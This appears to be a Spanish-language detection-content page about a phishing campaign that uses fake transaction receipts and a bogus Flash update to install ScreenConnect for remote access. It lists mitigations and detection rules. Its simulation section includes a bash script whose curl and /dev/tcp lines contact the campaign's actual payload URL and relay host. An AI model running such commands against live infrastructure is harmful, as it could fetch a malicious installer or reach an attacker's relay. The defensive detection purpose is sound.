Malware de Phishing/Estafa: Correos electrónicos de Phishing disfrazados como Recibos de Transacciones
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas están enviando correos electrónicos de phishing que se hacen pasar por empleados de empresas de EE. UU. e incluyen archivos adjuntos disfrazados como recibos de transacciones. El ataque utiliza un PDF malicioso para atraer a los usuarios a descargar una supuesta actualización de Adobe Flash Player que en realidad lanza un VBScript. El script luego instala la herramienta legítima de gestión remota ScreenConnect para establecer acceso remoto persistente para actividad posterior.
Investigación
AhnLab Security Intelligence Center (ASEC) identificó la campaña examinando el contenido del correo electrónico de phishing y el comportamiento del PDF adjunto. La investigación rastreó la cadena de ejecución desde el VBScript malicioso hasta la recuperación del payload en segundo plano y la instalación silenciosa de un paquete MSI utilizando curl.exe and msiexec.exe.
Mitigación
Los usuarios deben ser entrenados para reconocer intentos de phishing que involucren recibos de transacciones inesperados y solicitudes para instalar actualizaciones de software como Adobe Flash Player. Las organizaciones deben restringir la ejecución de VBScript y monitorear el uso no autorizado de herramientas de gestión remota, incluyendo ScreenConnect. La lista de aplicaciones permitidas también puede ayudar a prevenir la ejecución de paquetes MSI desconocidos o no aprobados.
Respuesta
Si se detecta actividad maliciosa, el sistema afectado debe ser aislado inmediatamente para prevenir el acceso remoto a través de ScreenConnect. Los respondedores deben terminar sesiones activas asociadas con relay.Gamedbd.Com la infraestructura e inspeccionar el registro para obtener información de sesiones almacenadas. Una investigación forense completa también debe determinar si ocurrió movimiento lateral o exfiltración de datos a través de la herramienta de gestión remota.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
LOLBAS WScript / CScript (vía process_creation)
Software de Acceso/Administración Remota Alternativo (vía process_creation)
Posible Infiltración/Exfiltración de Datos/C2 a través de Servicios/Herramientas de Terceros (vía proxy)
Posible Infiltración/Exfiltración de Datos/C2 a través de Servicios/Herramientas de Terceros (vía dns)
IOCs (HashMd5) para detectar: Malware Phishing/Estafa: Correos Electrónicos de Phishing Disfrazados como Recibos de Transacciones
Detección de Correos Electrónicos de Phishing Disfrazados como Recibos de Transacciones [Proxy]
Correo Electrónico de Phishing que Suplanta un Recibo de Transacción que Conduce a la Instalación de un Paquete MSI [Creación de Procesos de Windows]
Ejecución de Simulación
Requisito previo: La Verificación de Telemetría & Línea Base de Pre-vuelo debe haber pasado.
Rationale: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y narrativas DEBEN reflejar directamente las TTPs identificadas y aspirar a generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.
-
Narrativa del Ataque & Comandos: El adversario inicia una campaña de phishing enviando un correo electrónico sobre una transacción fallida. El enlace dirige a la víctima a
https://transaction-sucessful.vercel.app, que aloja un recibo falso. Cuando la víctima hace clic en «Descargar Recibo», el navegador intenta obtenerhttps://payment-six-eta.vercel.app/doc/sc.msi. Una vez que el payload se ejecuta, intenta establecer una sesión de acceso remoto conectándose al relay de ScreenConnect enrelay.gamedbd.com:8041. Esta secuencia prueba tanto la detección basada en URL como la lógica de detección basada en dominio/puerto. -
Script de Prueba de Regresión:
#!/bin/bash # Script de simulación para activar la regla de detección de Phishing/ScreenConnect echo "[+] Iniciando Simulación: Prueba de Detección de Phishing/ScreenConnect" # 1. Simular la descarga del MSI malicioso desde la URL de Vercel echo "[+] Paso 1: Simulando conexión a URL maliciosa de Vercel..." curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi" # 2. Simular la conexión al dominio/puerto específico del relay de ScreenConnect echo "[+] Paso 2: Simulando conexión al relay malicioso de ScreenConnect..." # Usamos /dev/tcp para simular un intento de conexión sin necesidad de un oyente real timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null echo "[+] Simulación Completa. Verifique SIEM para alertas." -
Comandos de Limpieza:
# No se crean artefactos persistentes con esta simulación basada en red. # Si se descargaron archivos locales, deben ser eliminados: rm -f sc.msi echo "[+] Limpieza completa."